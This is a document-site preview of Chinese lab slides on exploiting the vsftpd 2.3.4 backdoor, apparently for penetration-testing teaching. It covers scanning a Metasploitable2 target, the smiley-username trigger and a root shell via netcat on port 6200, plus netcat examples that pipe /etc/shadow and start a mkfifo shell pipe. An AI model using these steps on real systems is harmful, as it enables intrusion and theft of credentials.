版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
2.4文件传输服务后门漏洞利用与加固020301环境部署漏洞渗透测试任务目录漏洞介绍FTP是一个文件传输协议,用户通过FTP可从客户机程序向远程主机上传或下载文件,常用于网站代码维护、日常源码备份等。在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名包含”:)”时,服务器就会在6200端口监听,并且能够执行任意代码。VSFTP2.3.4漏洞实验环境部署针对ftp服务的后门漏洞01渗透环境Kali2.0下载:/get-kali/#kali-virtual-machines登录信息:
用户root
密码toorkali网络配置靶机环境靶机信息: metasploit2.0
登录用户 msfadmin
登录密码 msfadmin root账号测试用
123456漏洞渗透测试VSFTP2.3.4漏洞渗透测试02漏洞渗透测试-信息收集1.收集网络中存活的主机地址漏洞渗透测试-信息收集2.扫描系统类型以及端口信息漏洞渗透测试-信息收集3.在版本信息探测中,发现可能存在vsftp2.3.4漏洞漏洞渗透测试4.方式1:在物理机cmd中打开ftp输入带有:)符号的用户名,任意密码漏洞渗透测试4.方式2:在物理机打开ftp输入带有:)符号的用户名,任意密码漏洞渗透测试5.使用nmap–sS–p-32对目标进行全部对口扫描6.发现在利用:)笑脸符号登录时会开启6200后门端口漏洞渗透测试6.使用nc(瑞士军刀)工具,我们可以通过端口连接目标主机,并获得root权限任务一1.对靶机环境进行渗透测试2.找出上图靶机的flag3.获取目标靶机mysql权限,修改管理员登录密码为987654321Netcat扩展netcat:瑞士军刀 nc/netcat(选项)(参数) nc322查看该ip此端口上运行的程序 -l使用监听模式,监控传入的资料
-p[num]指定端口例: 1.Server-l1234ClientServer.ip1234聊天效果 2.Server-l1234>/etc/shadowClientServer.ip>myfile文件传输 3.建立管道mkfifo/tmp/tmp_fifo cat/tmp/tmp_fifo|/bin/sh-i2>&
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 钽碳还原火法冶炼工冲突管理评优考核试卷含答案
- 燃气储运工创新应用水平考核试卷含答案
- 清罐操作工安全生产基础知识模拟考核试卷含答案
- 铁氧体材料烧成工岗前工作技巧考核试卷含答案
- 道路客运调度员安全宣传能力考核试卷含答案
- 加气混凝土大板拼装工常识考核试卷含答案
- 反射炉工岗中工艺优化考核试卷含答案
- 蛋类制品加工工岗位责任制水平考核试卷含答案
- 商品监督员岗前成果转化考核试卷含答案
- 线绕电阻器、电位器制造工岗中应急测评考核试卷含答案
- 2026年高级考评员职业技能等级认定考试题附答案
- 2026年春招:广药集团面试题及答案
- 2026年河南省洛阳市公安招聘辅警考试试卷含答案
- 儿童耳科疾病的护理
- 2026中国土地整治与指标交易市场发展报告
- 2026年安全生产事故报告和调查处理条例课件(高清可编辑课件)
- 5.14玉米历险记《探寻新航路》课件-历史九年级上册
- CSCO胰腺癌诊疗指南(2026版)
- 1.4《闪亮的坐标劳模王进喜》课件 中职语文高教版职业模块
- 水岸山居调研课件
- 经济犯罪侦查课件
评论
0/150
提交评论